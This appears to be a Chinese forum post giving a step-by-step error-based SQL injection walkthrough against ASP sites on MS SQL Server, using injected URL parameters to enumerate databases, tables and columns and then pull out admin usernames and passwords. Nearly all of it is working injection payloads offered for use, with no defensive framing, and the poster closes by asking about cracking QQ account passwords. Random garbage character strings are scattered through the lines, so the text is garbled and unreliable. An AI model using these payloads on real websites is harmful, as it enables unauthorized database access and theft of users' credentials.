从暴库到暴密码的一般步骤
1:暴出所有库名. 6es7B6SPW"n4k-HLhttp://www.***.com/***.asp?id=1 and 0<>(select count(*) %~?E%QNU!}
from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
2:暴出库中的表
假设存在一个bbs的数据库,提交下面的语句: -t3nV||,u(\:J
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U') E%^'QJ LooJ
来得到一个表 假设为 admin
提交:
http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.sysobjects where xtype='U' and name not in '`f0|ey,t,[/b;Q
('Admin')) _Tm:{+d:acIZ;B
来得到其他的表。 x0rL s IZ7Eo Z k
3:暴出表中的字段
提交:
http://www.***.com/***.asp?id=1 and 0<>(select count(*)
from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) A*GaQ1BK%? \{
得到UID的数值假设为18779569 uid=id
提交:
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name wn|J a$T R
from bbs.dbo.syscolumns where id=18779569) _U DAc*G/|
得到一个admin的一个字段,假设为 user_id
提交: 7^U(uwy
http://www.***.com/***.asp?id=1 and 0<>(select top 1 name
from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)) V3flo!Is*R
来暴出其他的字段
uc6XW p2tl
4:暴出用户名和密码等
假设存在user_id username ,password 等字段,提交:
http://www.***.com/***.asp?id=1 and 0<(select user_id from
BBS.dbo.admin where username>1) '?v5_Q6W2f
可以得到用户名
依次可以得到密码。。。。。 可以用来暴QQ空间密码不???:)15) :)101:) z]g)]"h%gV
可以的话 联系我啊.......
289955742
页:
[1]